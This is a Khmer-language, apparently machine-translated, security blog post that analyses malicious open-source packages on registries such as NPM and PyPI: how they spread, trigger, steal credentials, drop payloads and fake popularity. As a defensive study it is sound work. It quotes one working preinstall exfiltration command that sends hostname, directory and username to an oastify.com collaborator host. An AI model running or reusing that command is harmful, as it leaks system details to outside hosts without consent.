កញ្ចប់ព្យាបាទ ៥

កាយវិភាគសាស្ត្រនៃកញ្ចប់ព្យាបាទ៖ តើនិន្នាការអ្វីខ្លះ?

​មាតិកា

ប្រកាសដែលត្រូវតែអាន

ប្រកាសថ្មីៗបំផុតដែលគួរឱ្យចាប់អារម្មណ៍

នៅក្នុងវគ្គមុននេះ ស. កញ្ចប់ព្យាបាទប្រភពបើកចំហ៖ បញ្ហាយើងបានពិភាក្សាអំពីមូលហេតុដែលអ្នកគំរាមកំហែងមានចរិតបែបនេះ មានចំណង់ចំណូលចិត្តយ៉ាងខ្លាំងចំពោះការបោះពុម្ពផ្សាយសមាសធាតុព្យាបាទថ្មីៗ ឬការចាក់មេរោគទៅក្នុងកំណែចុងក្រោយបំផុតនៃសមាសធាតុដែលមានស្រាប់៖ ហេដ្ឋារចនាសម្ព័ន្ធប្រភពបើកចំហអនុញ្ញាតឱ្យនរណាម្នាក់នៅគ្រប់ទីកន្លែងបង្កើតគណនីបណ្ដោះអាសន្ន។ នៅក្នុងបញ្ជីឈ្មោះសមាសភាគ (ដូចជា NPM, PyPI, Docker Hub ឬ Visual Studio Marketplace) ឬវេទិកាអភិវឌ្ឍន៍សហការ (ដូចជា GitHub)។ មិនចាំបាច់ចំណាយច្រើន និងមានឱកាសជាច្រើនសម្រាប់ការទាញយកអត្ថប្រយោជន៍ពីការជឿទុកចិត្តលើសលប់ដែលក្រុមកម្មវិធីមានជាប្រពៃណីលើសមាសភាគភាគីទីបី។ 

ភាពមិនស៊ីមេទ្រីរវាងភាពងាយស្រួលសម្រាប់អ្នកវាយប្រហារក្នុងការចែកចាយមេរោគដោយប្រើហេដ្ឋារចនាសម្ព័ន្ធដែលមានសម្រាប់ប្រភពបើកចំហ និងការលំបាកសម្រាប់អង្គការដែលកំពុងអភិវឌ្ឍកម្មវិធី (មនុស្សគ្រប់គ្នា?) ក្នុងការជៀសវាងការឆ្លងមេរោគ (និងចែកចាយមេរោគនៅក្នុងកម្មវិធីដែលពួកគេចែកចាយសម្រាប់អ្នកដទៃ) បាននាំឱ្យមានចំនួនកញ្ចប់មេរោគជិតដល់មួយភាគបួនលានកាលពីឆ្នាំមុន។ 

នេះ​គឺជា​បញ្ហា​ដ៏​ធំ​មួយ​ដែល​គ្មាន​អង្គការ​ណា​មួយ​អាច​ដោះស្រាយ​វា​បាន​ឡើយ ហើយ​សហគមន៍​កំពុង​ស្ថិត​ក្នុង​ដំណើរការ​កែសម្រួល​ដំណើរការ​ប្រភព​បើកចំហ​ទាក់ទង​នឹង​ការ​ទុកចិត្ត គោលការណ៍​សុវត្ថិភាព​តាម​លំនាំដើម និង​គោលការណ៍​សុវត្ថិភាព​តាម​ការ​រចនា និង​វដ្ត​ជីវិត​នៃ​សមាសធាតុ។ យើង​នឹង​ពិនិត្យ​មើល​គំនិត​បែបនេះ​នៅ​ក្នុង​វគ្គ​បន្ទាប់។ ការការពារប្រឆាំងនឹងកញ្ចប់ព្យាបាទប្រភពបើកចំហ៖ អ្វីដែល (មិន) ដំណើរការ.

សូមចងចាំថាយើងកំពុងនិយាយអំពីសមាសធាតុកម្មវិធីដែលភាគច្រើនត្រូវគ្នានឹង កញ្ចប់សូហ្វវែរ: សមាសធាតុដែលអាចប្រើឡើងវិញបានត្រូវបានខ្ចប់ ដូច្នេះពួកវាអាចត្រូវបានយោងជាភាពអាស្រ័យនៅក្នុង manifest កម្មវិធី និងត្រូវបានដំឡើងជាមួយកម្មវិធីគ្រប់គ្រងកញ្ចប់ ឬឧបករណ៍បង្កើត។ សូមចំណាំថាករណីនេះអាចត្រូវបានពង្រីកដើម្បីរួមបញ្ចូលសាធារណៈ រូបភាពធុង (ប្រើដោយពេលដំណើរការកុងតឺន័រ និងវេទិការៀបចំដូចជា Kubernetes) និង ផ្នែកបន្ថែមទៅឧបករណ៍កម្មវិធី (សម្រាប់ការសាងសង់ ស្វ័យប្រវត្តិកម្ម និងការដាក់ពង្រាយ)។ 

នៅទីនេះយើងវិភាគពីរបៀបដែលរឿងនេះ យុទ្ធសាស្ត្រវាយប្រហារដោយផ្អែកលើសមាសធាតុព្យាបាទ ដំណើរការ​ទៅតាមឧទាហរណ៍ពីមុន និងអ្វីដែលយើងបានឃើញនៅក្នុងវេទិការបស់យើងសម្រាប់ការព្រមានជាមុនអំពីមេរោគ (MEW)។ យើងនឹងវិភាគសមាសធាតុព្យាបាទក្នុងវិមាត្រផ្សេងៗគ្នា៖ 

(1) វិធីដែលបានជ្រើសរើសសម្រាប់ការចែកចាយ (បញ្ជីឈ្មោះដែលបានប្រើ នៅក្នុងសមាសភាគថ្មី ឬដែលមានស្រាប់ និងបច្ចេកទេសដែលប្រើសម្រាប់ឆ្លងកំណែសមាសភាគដែលបានបោះពុម្ពផ្សាយ), (2) របៀបដែលមេរោគត្រូវបានធ្វើឱ្យសកម្ម ឬបង្កឡើង (3) ឥរិយាបថព្យាបាទ ពោលគឺសកម្មភាពបង្កគ្រោះថ្នាក់អ្វីខ្លះដែលត្រូវបានគេសង្កេតឃើញ និងមួយណាជាការលើកទឹកចិត្តរបស់អ្នកវាយប្រហារ (4) បច្ចេកទេសណាខ្លះដែលជារឿងធម្មតាសម្រាប់ការបិទបាំង ការលាក់ខ្លួនដើម្បីមិនឱ្យគេកត់សម្គាល់ ចលនាចំហៀង ការទំនាក់ទំនងជាមួយម៉ាស៊ីនបញ្ជា និងត្រួតពិនិត្យ (C2) ។ល។ និង (5) បច្ចេកទេសសម្រាប់ទទួលបានប្រជាប្រិយភាព និងការជឿទុកចិត្តគ្រប់គ្រាន់ ដូច្នេះជនរងគ្រោះនឹងដំឡើងសមាសធាតុនោះ។

យន្តការចែកចាយដែលបានជ្រើសរើស

យើងសង្កេតឃើញ “សំលេងរំខានផ្ទៃខាងក្រោយនៃកញ្ចប់ព្យាបាទដែលមិនស្មុគស្មាញដោយប្រើ typosquatting ដើម្បីបន្លំអ្នកអភិវឌ្ឍន៍ដែលមិនប្រុងប្រយ័ត្នជាមួយនឹងកំហុសវាយអក្សរនៅក្នុងឈ្មោះកញ្ចប់សម្រាប់ការពឹងផ្អែករបស់ពួកគេ។ កញ្ចប់ពេញនិយមជាច្រើនទទួលបានកញ្ចប់ដែលមានឈ្មោះស្រដៀងគ្នាជាមួយនឹងកំហុសវាយអក្សរ ដោយមានការរំពឹងទុកថាពួកគេនឹងបន្លំអ្នកអភិវឌ្ឍន៍ដែលមិនប្រុងប្រយ័ត្នមួយចំនួន។ 

ពួកគេប្រើប្រាស់គណនីបណ្ដោះអាសន្នមួយ បោះពុម្ពផ្សាយក្រុមកញ្ចប់ typosquat បង្កើតមួយផ្សេងទៀត និងបោះពុម្ពផ្សាយក្រុមមួយផ្សេងទៀត... ដោយប្រើស្វ័យប្រវត្តិកម្ម និងភាពប៉ិនប្រសប់មួយចំនួន ពួកគេអាចទទួលបានភាពទំនើបខ្លះ ប៉ុន្តែជាធម្មតាពួកវាមានលក្ខណៈសាមញ្ញណាស់។ យើងហៅពួកគេជាផ្ទៃក្នុងថា "anchovies«ការលួចព័ត៌មានសម្គាល់ខ្លួនគឺជាគោលដៅចម្បង ប៉ុន្តែពេលខ្លះយើងឃើញមានកម្មវិធីចារកម្មលួចយកកូដប្រភព ឬទិន្នន័យរសើបដូចជាព័ត៌មានកំណត់អត្តសញ្ញាណផ្ទាល់ខ្លួន (PII) ការចាប់យកក្ដារតម្បៀតខ្ទាស់ និងការសង្ស័យផ្សេងៗទៀត។»

ចេញពីពណ៌ខៀវ យើងឃើញសមាសធាតុព្យាបាទដ៏ស្មុគស្មាញជាងនេះ គឺ "ត្រីឆ្លាម"។ ជនជាតិភាគតិចត្រូវបានកំណត់គោលដៅទៅកាន់ក្រុម ឬអង្គការជាក់លាក់ ជាធម្មតាជាមួយឧបករណ៍បង្ហូរគ្រីបតូ ឬឧបករណ៍ស្កែមគេហទំព័រ ដែលត្រូវបានធ្វើឱ្យសកម្មតាមលក្ខខណ្ឌ ប្រហែលជាធ្វើតាមវិធីសាស្រ្តដែលឃើញនៅក្នុង ហេតុការណ៍​ស្ទ្រីម​ព្រឹត្តិការណ៍ នៃការឌិគ្រីបទិន្នន័យវាយប្រហារ លុះត្រាតែកញ្ចប់ត្រូវបានយោងពីកញ្ចប់គោលដៅ។ 

យន្តការចែកចាយត្រូវបានវិភាគនៅក្នុងឯកសារដ៏ល្អឥតខ្ចោះ និងឥឡូវនេះជាឯកសារបុរាណ “ការប្រមូលកាំបិតរបស់អ្នកចាក់ខាងក្រោយ៖ ការពិនិត្យឡើងវិញអំពីការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីប្រភពបើកចំហ"ដែលជាសៀវភៅដែលត្រូវតែអាន។ ប្រាកដណាស់ អ្នកធ្លាប់បានឃើញតារាងដ៏ល្អនេះពីមុនមក៖ 

កញ្ចប់ព្យាបាទ

មធ្យោបាយទាំងអស់ត្រូវបានរុករក រួមទាំងកញ្ចប់ថ្មី និងកញ្ចប់ដែលមានស្រាប់ ដែលប៉ះពាល់ដល់កូដប្រភព ប្រព័ន្ធសាងសង់ ឬសមាសធាតុដែលបានវេចខ្ចប់ខ្លួនឯង ការប្រើប្រាស់ព័ត៌មានសម្ងាត់ដែលត្រូវបានគេលួច ឬវិស្វកម្មសង្គម ការលួចយកគណនី និងឃ្លាំងដែលបោះបង់ចោល ឬការបំពុលគណនី និងឃ្លាំងដែលបានថែទាំ។ ការវាយប្រហារមួយចំនួនបានទទួលឈ្មោះ (បន្លំ, ភាពច្របូកច្របល់នៃការពឹងផ្អែក, ភាពច្របូកច្របល់ជាក់ស្តែង, ការដកយកមកវិញ។ល។) ហើយត្រូវបានពិភាក្សារួចហើយនៅកន្លែងផ្សេង។ 

ចុះ​ចំណែក​បញ្ជី​ដែល​បាន​ជ្រើសរើស​វិញ?

NPM នៅតែបន្តនាំមុខគេក្នុងចំនួនសរុបនៃកញ្ចប់មេរោគព្យាបាទ ប៉ុន្តែយើងបានឃើញការកើនឡើងយ៉ាងខ្លាំងចាប់តាំងពីឆ្នាំនេះនៅលើ PyPI។ Python គឺជាប្រព័ន្ធអេកូឡូស៊ីដ៏ពេញនិយមសម្រាប់វិទ្យាសាស្ត្រទិន្នន័យ និងការរៀនម៉ាស៊ីន។ តាមពិតទៅ ដង់ស៊ីតេមេរោគឥឡូវនេះខ្ពស់ជាងនៅក្នុង PyPI ជាងនៅក្នុង NPM។ 

របៀបដែលមេរោគត្រូវបានបង្កឡើង

កញ្ចប់ព្យាបាទត្រូវបានបង្កឡើងក្នុងអំឡុងពេលដំឡើងមានតែ 4 ក្នុងចំណោម 10 ករណីប៉ុណ្ណោះ (ក្នុងរយៈពេលប៉ុន្មានឆ្នាំចុងក្រោយនេះ វាជិតដល់ 6 ក្នុងចំណោម 10 ករណី)។ កញ្ចប់ដែលនៅសល់ដំណើរការឥរិយាបថព្យាបាទនៅពេលដំណើរការ ដោយមាន 1 ក្នុងចំណោម 100 ត្រូវបានបង្កឡើងនៅពេលដំណើរការការធ្វើតេស្ត។ សត្រូវហាក់ដូចជាដឹងថាការប្រតិបត្តិស្គ្រីបដំឡើងដែលមិនអាចគ្រប់គ្រងបានត្រូវបានបិទនៅកន្លែងជាច្រើន។

តើ​មនុស្ស​អាក្រក់​កំពុង​ទទួល​បាន​អ្វី?

យើងនឹងរាយបញ្ជីប្រភេទអាកប្បកិរិយាព្យាបាទ ដោយចាប់ផ្តើមពីប្រភេទដែលពេញនិយមបំផុតជាមុនសិន។ សូមចំណាំថាផលប៉ះពាល់អាចខុសគ្នាខ្លាំង៖ ក ឧបករណ៍ជូតទឹក គឺជាការបំផ្លិចបំផ្លាញដ៏រឹងរូស ប៉ុន្តែវាមិនមែនជារឿងធម្មតាទេ ហើយត្រូវបានគេឃើញតែក្នុងករណីមួយចំនួនតូចប៉ុណ្ណោះ ដែលទាក់ទងនឹងយុទ្ធនាការសង្គ្រាមតាមអ៊ីនធឺណិតដែលមានគោលដៅ ឬការលួចចូលប្រព័ន្ធកុំព្យូទ័រយ៉ាងឃោរឃៅ។ ប្រភេទខាងក្រោមនេះគឺជារឿងធម្មតាណាស់៖

  • InfoStealer / Credentials Drainerរហូតមកដល់ពេលនេះ ការវាយប្រហារដែលមិនស្មុគស្មាញជាង 90% គឺជាអ្នកលួចដ៏សាមញ្ញ ដែលភាគច្រើនស្វែងរកព័ត៌មានសម្ងាត់ដូចជា ពាក្យសម្ងាត់ ថូខឹនចូលប្រើ កូនសោ API និងកូនសោឯកជន (សម្រាប់ SSH និងអ្វីៗផ្សេងទៀត)។ វាប្រហែលជាវិធីងាយស្រួលបំផុតក្នុងការសរសេរ (រួមជាមួយឧបករណ៍លុបទិន្នន័យ?)។ ពួកគេរាយបញ្ជីឯកសារ/ថតឯកសារដែលគេស្គាល់ និងប្រភពផ្សេងទៀត (ឧទាហរណ៍ កូនសោចុះបញ្ជី) វេចខ្ចប់ខ្លឹមសារ និងផ្ញើទិន្នន័យនោះទៅម៉ាស៊ីនមេ C2។ គំនិតគឺសាមញ្ញ៖ "ខ្ញុំបោះពុម្ពផ្សាយកម្មវិធីលួចសម្រាប់ព័ត៌មានសម្ងាត់បន្លំ ដូច្នេះខ្ញុំអាចប្រើព័ត៌មានសម្ងាត់សម្រាប់ការវាយប្រហារដោយផ្ទាល់នៅពេលក្រោយ"។ 

បណ្តាញ C2 ដែលត្រូវបានគេសង្កេតឃើញជាធម្មតាមានតម្លៃថោក និងកខ្វក់ ដូចជាបណ្តាញ Telegram ឬ ឧបករណ៍​ជីក​រូង​ក្រោម​ដី​ដែល​ស្រដៀង​នឹង​ង៉ុក (ជារឿយៗក្នុងទម្រង់ជាប្រូកស៊ីបញ្ច្រាសដែលបង្ហាញតាមរយៈ IP ច្រកចេញ VPN)។ មានលទ្ធភាពរាប់រយ (!) ជាមួយនឹងគម្រោង GitHub ជាច្រើននៅក្រោម ប្រធានបទលួចពាក្យសម្ងាត់ជំនាញដូចជា keyloggers គឺកម្រមានសម្រាប់កញ្ចប់ព្យាបាទ និងរូបភាពកុងតឺន័រ ប៉ុន្តែវាកើតឡើងញឹកញាប់ជាងនៅក្នុងផ្នែកបន្ថែមឧបករណ៍ ដែលអន្តរកម្មរបស់អ្នកប្រើប្រាស់ត្រូវបានរំពឹងទុក។

  • ឧបករណ៍​ទម្លាក់ / ឧបករណ៍​ទាញយកមានប្រជាប្រិយភាពលំដាប់ទីពីរ ជាធម្មតាស្ថិតនៅលំដាប់ទីមួយក្នុងការវាយប្រហារច្រើនដំណាក់កាល។ សមាសធាតុព្យាបាទច្រើនជាងមួយក្នុងចំណោមបីមាន droppers (ប្រសិនបើ payload ព្យាបាទរួមបញ្ចូលនៅក្នុងកញ្ចប់) ឬ downloader (payload ត្រូវបានទាញយកពីចំណុចបញ្ចប់ក្រោមការគ្រប់គ្រងរបស់អ្នកវាយប្រហារ)។ payload ជារឿយៗជាបំរែបំរួលមេរោគគោលពីរដែលគេស្គាល់ ហើយវាត្រូវបានដំណើរការ និងជួនកាលនៅតែបន្ត សម្រាប់ការដំឡើង backdoor, spyware, crypto drainers និងករណីប្រើប្រាស់ផ្សេងទៀត។ payload ដែលបានទាញយក ឬដាក់ពង្រាយចាប់ផ្តើមការវាយប្រហារដំណាក់កាលទីពីរជាមួយនឹងថាមពលទាំងអស់ដែលផ្តល់ដោយប្រព័ន្ធគោលពីរមេរោគដែលមានស្រាប់។ ប្រព័ន្ធគោលពីរអាចត្រូវបានចែកចាយនៅក្នុងកញ្ចប់ ដែលជារឿយៗត្រូវបានក្លែងបន្លំជារូបភាព ឬប្រភេទឯកសារដែលមិនបង្កគ្រោះថ្នាក់ ដើម្បីជៀសវាងការរកឃើញ ខណៈពេលភ្ជាប់ទៅគេហទំព័រដែលមិននឹកស្មានដល់។ 
  • អ្នកលួច/អ្នកជីកយករូបិយប័ណ្ណឌីជីថលគូប្រជែងដែលមានការលើកទឹកចិត្តផ្នែកហិរញ្ញវត្ថុមានឆន្ទៈក្នុងការប្រើប្រាស់ទ្រព្យសកម្មពពករបស់អ្នកសម្រាប់ដំណើរការ cryptominers (ពួកគេថែមទាំងរកឃើញថាតើពួកគេកំពុងដំណើរការនៅក្នុង cloud VM ដែរឬទេ)។ ពួកគេមិនខ្វល់ពី អត្រាប្រាក់ចំណេញទាប ១ ដុល្លារសម្រាប់រាល់ ៥៣ ដុល្លារដែលត្រូវបានគិតប្រាក់ទៅជនរងគ្រោះសម្រាប់ហេដ្ឋារចនាសម្ព័ន្ធ cloud ដែលត្រូវបានគេលួច។ ជនរងគ្រោះប្រហែលជាមិនដឹងអំពីរឿងនេះទេរហូតដល់ពួកគេទទួលបានវិក្កយបត្រដែលមិននឹកស្មានដល់។ ជាសំណាងល្អ រឿងនេះកើតឡើងហើយក៏បាត់ទៅវិញ។ ក្លែងក្លាយ យុទ្ធនាការនៅក្នុងកញ្ចប់ព្យាបាទជួនកាលលេចឡើង ហើយបន្ទាប់មករសាត់បាត់ទៅ ការបន្លំសម្រាប់អ្នកប្រើប្រាស់កាបូបលុយ ឬនៅទីបំផុតកំណត់គោលដៅអ្នកផ្តល់សេវាកាបូបលុយ ដូចជានៅក្នុង ការវាយប្រហារលើសៀវភៅបញ្ជី.   

ឥរិយាបថផ្សេងទៀត ដូចជាការដាក់ពង្រាយ Backdoor សម្រាប់ការប្រតិបត្តិកូដពីចម្ងាយដោយការបើក reverse shell គឺមិនសូវកើតមានញឹកញាប់ជាងពេលមុនៗទេ។ ឧទាហរណ៍ គេហទំព័រអ្នករួមចំណែក 123rf កញ្ចប់ (ឥឡូវនេះត្រូវបានដកចេញពីបញ្ជីឈ្មោះ) បើកដោយគ្មានការបិទបាំងណាមួយឡើយ សែលបញ្ច្រាស់ត្រូវបានចម្លង និងបិទភ្ជាប់ពី សន្លឹកបន្លំ Reverse Shell:

កញ្ចប់ព្យាបាទ ៤
ប្រភេទកញ្ចប់ព្យាបាទត្រូវបានគេសង្កេតឃើញក្នុងអំឡុងសប្តាហ៍ថ្ងៃទី ២៤-៣០ ខែមិថុនា ឆ្នាំ ២០២៤។

បន្ថែមពីលើសមាសធាតុស្របច្បាប់ និងសមាសធាតុព្យាបាទ យើងបានសង្កេតឃើញការរំលោភបំពានជាច្រើន រួមមាន៖

កញ្ចប់សារឥតបានការ

មានកញ្ចប់តូចៗរាប់ពាន់ ភាគច្រើននៅក្នុង NPM ដោយគ្មានមេរោគ ប៉ុន្តែសន្យាថានឹងរកប្រាក់ចំណូលបានយ៉ាងងាយស្រួល ប្រេងពស់ តំណភ្ជាប់ទៅកាន់ការផ្តល់ជូន Viagra និងអ្វីៗផ្សេងទៀត។ អ្នកប្រើប្រាស់មួយចំនួនបានបោះពុម្ពផ្សាយសារឥតបានការបែបនេះ ហើយយក bandwidth ច្រើនពីបញ្ជីឈ្មោះ។ តារាសម្តែងម្នាក់ទៀតដែលអាចមកពីប្រទេសឥណ្ឌូនេស៊ីបានព្យាយាមទាញយកអត្ថប្រយោជន៍ដោយ ការរំលោភបំពានលើចំណាត់ថ្នាក់តែ មានបំណងសម្រាប់ផ្តល់សំណងដល់អ្នកអភិវឌ្ឍន៍ប្រភពបើកចំហ ដោយបង្កើតកញ្ចប់ NPM រាប់ម៉ឺនដែលទាក់ទងគ្នាជាមួយឃ្លាំង GitHub dummy ដែលពាក់ព័ន្ធ។ នេះគឺជាការរំលោភបំពានយ៉ាងច្បាស់លាស់លើលក្ខខណ្ឌនៃការប្រើប្រាស់។

ការបោកប្រាស់អំពីរង្វាន់កំហុស និងការស្រាវជ្រាវសុវត្ថិភាព

 នៅពេលដែលកញ្ចប់មួយពណ៌នាខ្លួនឯងថាជាការលួចយកទិន្នន័យសម្រាប់គោលបំណងល្អ ដូចជាការរកឃើញចំណុចខ្វះខាតសុវត្ថិភាពសម្រាប់កម្មវិធីផ្តល់រង្វាន់កំហុស ឬការស្រាវជ្រាវទិដ្ឋភាពជាក់លាក់នៃប្រព័ន្ធអេកូឡូស៊ី។ យើងបានឃើញកញ្ចប់រាប់ពាន់នៅក្នុងប្រភេទនេះ ដែលទាញយកការកំណត់អត្តសញ្ញាណ ប៉ុន្តែមិនមែនជាទិន្នន័យរសើបពេកទៅកាន់អាសយដ្ឋាន Burp Collaborator ពី PortSwigger (ឧទាហរណ៍ ម៉ាស៊ីននៅក្នុងដែន oastify.com)។ យើងបានសង្កេតឃើញជាញឹកញាប់នូវច្បាប់ចម្លងនៃ ភាពច្របូកច្របល់នៃការពឹងផ្អែក ភស្តុតាងនៃគំនិតដោយ Alex Birsan ដូចជា aurora-webmail-pro កញ្ចប់ (ត្រូវបានដកចេញពីបញ្ជីឈ្មោះ) ដែលគ្រាន់តែដំណើរការកូដអាក្រក់នេះនៅក្នុងស្គ្រីបមុនដំឡើង៖

exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done")  

ហើយ​ក៏​រួម​បញ្ចូល​ទាំង​ពាក្យ «នេះគឺជាភស្តុតាងនៃគំនិតនៃការវាយប្រហារភាពច្របូកច្របល់ Dependency សាមញ្ញការពិពណ៌នាអំពីសេចក្តីប្រកាសមិនទទួលខុសត្រូវនៅក្នុង កញ្ចប់នេះ​ជា​ការ​រំលោភ​បំពាន​យ៉ាង​ច្បាស់​លើ​លក្ខខណ្ឌ​នៃ​សេវាកម្ម សូម្បី​តែ​គ្មាន​ចេតនា​អាក្រក់​ក៏​ដោយ។ 

មានដំណឹងល្អខ្លះទេ? យើងមិនទាន់បានឃើញការវាយប្រហារ ransomware តាមរយៈសមាសធាតុព្យាបាទនៅឡើយទេ។ ដោយមិនដឹងមូលហេតុ ឧក្រិដ្ឋជនតាមអ៊ីនធឺណិតហាក់ដូចជាចូលចិត្តយន្តការចែកចាយការបន្លំអ៊ីមែលបែបប្រពៃណី ផ្អែកលើ RDP និង drive-by download។ 

បច្ចេកទេសបន្ថែមដែលបានសង្កេតឃើញ 

កញ្ចប់ព្យាបាទ ៤

បច្ចេកទេសជាច្រើនត្រូវបានប្រើសម្រាប់ការស៊ូទ្រាំ ការគេចវេសពីការការពារខ្លួន ការប្រមូលព័ត៌មាន ការទំនាក់ទំនងជាមួយម៉ាស៊ីនបញ្ជា និងត្រួតពិនិត្យ និងការលួចចូល។ 

ការតស៊ូ នៅក្នុងសមាសធាតុព្យាបាទ ត្រូវបានទទួលបានដោយប្រើលក្ខណៈពិសេសនៃការបន្តនៅក្នុងមេរោគគោលពីរដំណាក់កាលទីពីរ ប៉ុន្តែពេលខ្លះឥរិយាបថនេះមានទីតាំងនៅក្នុងកូដកញ្ចប់ ដោយភារកិច្ចដែលបានកំណត់ពេល និងការផ្លាស់ប្តូរនៅក្នុងបញ្ជីឈ្មោះវីនដូគឺជារឿងធម្មតាបំផុត។ 

Obfuscation គឺជារឿងធម្មតា ប៉ុន្តែមិនស្មុគស្មាញទេ។ កញ្ចប់វាយអក្សរភាគច្រើន (សូមចងចាំ "anchovies") កុំប្រើការបិទបាំងទាល់តែសោះ។ មនុស្សជាច្រើនប្រើទាំងការអ៊ិនកូដ base64/hex ឬស៊ីហ្វឺរជំនួសដូចជា rot13) ឬប្រើឧបករណ៍បិទបាំងកូដ និងការបង្រួមទំហំកូដដែលមាន ដែលងាយស្រួលបញ្ច្រាស់ដោយប្រើឧបករណ៍ត្រឹមត្រូវ។ មានតែ "ត្រីឆ្លាម" ទេដែលធ្វើការបិទបាំងពិតប្រាកដ រឹងរូស ពិបាកវិស្វកម្មបញ្ច្រាស់។

ការបិទបាំងអាចលាក់បាំងការវាយប្រហារ ប៉ុន្តែហេតុអ្វីបានជាកូដនៅក្នុងសមាសធាតុប្រភពបើកចំហត្រូវបិទបាំង? តើមានភស្តុតាងដែលបង្ហាញថាមានអ្វីមួយត្រូវលាក់បាំងពីការមើលឃើញធម្មតាទេ? យើងបានរកឃើញឧទាហរណ៍ជាច្រើននៃកញ្ចប់ដែលមិនមានមេរោគដែលប្រើការបិទបាំងដើម្បីការពារកម្មសិទ្ធិបញ្ញា ដែលផ្ទុយពី "ប្រភពបើកចំហ"។ ការបិទបាំងអាចត្រូវបានប្រើជាភស្តុតាងនៃមេរោគ ប៉ុន្តែវាមិនមែនជាការសន្និដ្ឋានច្បាស់លាស់ទេ។ វាក៏ពិបាកក្នុងការបំបាត់ការបិទបាំងផងដែរ។ 

ការគេចវេស ពីការគ្រប់គ្រងការការពារជាតិ ប្រើប្រាស់បច្ចេកទេសសាមញ្ញៗ។ កូដព្យាបាទច្រើនតែត្រូវបានការពារនៅក្នុង ព្យាយាម...ចាប់ ប្លុកដែលមិនអើពើនឹងករណីលើកលែងណាមួយ ដូច្នេះសកម្មភាពមិនប្រក្រតីមិនត្រូវបានបង្ហាញនៅក្នុងកំណត់ហេតុទេ។ ការផ្ទៀងផ្ទាត់បរិស្ថាន (ដែលកំពុងដំណើរការនៅក្នុង VM ឬកុងតឺន័រ) គឺកម្រមានណាស់ លុះត្រាតែមានមេរោគដែលកំណត់គោលដៅលើអង្គការ ឬបរិស្ថានជាក់លាក់ណាមួយ។

ការក្លែងបន្លំប្រព័ន្ធគោលពីរនៅក្នុងរូបភាព និងឯកសារ PDF (ប្រភេទ steganography) គឺជាបច្ចេកទេសមួយផ្សេងទៀតដែលត្រូវបានគេមើលឃើញថាអាចគេចផុតពីការរកឃើញ។

ដោយសារសមាសធាតុព្យាបាទទូទៅបំផុតគឺ infostealers ការ​ប្រមូល​ទិន្នន័យ គឺមានសារៈសំខាន់ណាស់។ អាថ៌កំបាំង (ពាក្យសម្ងាត់ ថូខឹនចូលប្រើ កូនសោ API កូនសោគ្រីបតូក្រាហ្វិច) ត្រូវបានស្កេនជាប្រចាំនៅក្នុងឯកសារកំណត់ហេតុ អថេរបរិស្ថាន និងសូម្បីតែក្ដារតម្បៀតខ្ទាស់ (ឃើញជាមួយមេរោគ Trojans ធនាគារ និងអ្នកលួចគ្រីបតូ)។ ការលួចយកកូដប្រភពក៏ជារឿងធម្មតាដែរ ព្រោះការដំឡើងកញ្ចប់ត្រូវបានធ្វើឡើងជាញឹកញាប់នៅក្នុងថ្នាំងអភិវឌ្ឍន៍ដែលឃ្លាំង git ខាងក្នុងអាចត្រូវបានក្លូន។ យើងបានឃើញកញ្ចប់រាយបញ្ជីថតដើម្បីស្វែងរកឃ្លាំង git។ ការស្វែងរកទីតាំងដូចជា .env, private.pem, settings.py, app.js ឬ application.properties គឺជារឿងធម្មតាណាស់។

ការ​លួច​យក​ទិន្នន័យ​ចេញ (Exfiltration) គឺជា​សកម្មភាព​មួយ​ផ្សេង​ទៀត​ដែល​ត្រូវ​បាន​ដាក់​ពង្រាយ​យ៉ាង​ទូលំទូលាយ។ មាន​តែ​កញ្ចប់​មេរោគ​មួយ​ចំនួន​តូច​ប៉ុណ្ណោះ​ដែល​ព្យាយាម​លាក់​គោលដៅ​នៃ​ទិន្នន័យ​ដែល​បាន​ស្រង់​ចេញ។ ឆានែល Telegram និង ផ្លូវរូងក្រោមដីដែលមានរាងដូចង៉ុក ត្រូវបានគេប្រើជាញឹកញាប់។ ហើយមានច្រើន ជាធម្មតា ដែនដែលបានដាក់ក្នុងបញ្ជីស ដែលត្រូវបានប្រើសម្រាប់ការច្រោះចេញ

បច្ចេកទេសផ្សេងទៀត ដូចជាការកើនឡើងសិទ្ធិ ឬចលនាចំហៀង គឺមិនសូវកើតមានទេ។ 

ទទួលបានប្រជាប្រិយភាព និងទំនុកចិត្ត

ស្រមៃមើលចោរបច្ចេកវិទ្យាម្នាក់ដែលមានរបស់ព្យាបាទឃាតករដែលត្រៀមរួចជាស្រេច ហើយឆ្ងល់ថា "តើខ្ញុំធ្វើដូចម្តេចដើម្បីឲ្យរបស់ដ៏ថោកទាបនេះគួរឱ្យទុកចិត្តចំពោះមនុស្សល្ងង់ខ្លៅទាំងនោះ?" 

នោះបកប្រែទៅជារបៀបបង្កើតធាតុសម្រាប់សមាសធាតុព្យាបាទដើម្បីបង្ហាញផ្កាយ / សមជាច្រើន (សម្រាប់ប្រជាប្រិយភាព) បូករួមទាំងកំណែ / បញ្ហា និង pull requests (សម្រាប់សកម្មភាព)។ គំនិតនេះគឺដើម្បីទទួលបានប្រជាប្រិយភាពប្រឌិត (ផ្កាយ) និងអ្នកនៅក្នុងបន្ទុក និងរូបរាងដ៏គួរឱ្យជឿជាក់ទាក់ទងនឹងភាពពាក់ព័ន្ធ និងការថែទាំ។ 

បញ្ជីឈ្មោះមិនពិនិត្យមើលថាតើខ្លឹមសារនៅក្នុងគម្រោង GitHub និងខ្លឹមសារកញ្ចប់ត្រូវគ្នាឬអត់ទេ។នេះគឺជាបញ្ហាដែលគេស្គាល់យ៉ាងច្បាស់នៅក្នុងខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី។ ការចុះបញ្ជីសាធារណៈគឺជារណ្តៅដ៏ធំដែលលេបត្របាក់អ្វីៗគ្រប់យ៉ាងដែលពួកគេបានបោះចោល។ អ្នកអាចភ្ជាប់ឃ្លាំងទិន្នន័យណាមួយ។ 

កញ្ចប់ព្យាបាទ ៤
ការចែកចាយភស្តុតាងនៅក្នុងមេរោគដែលអាចកើតមានក្នុងអំឡុងសប្តាហ៍ថ្ងៃទី 24-30 ខែមិថុនា ឆ្នាំ 2024។

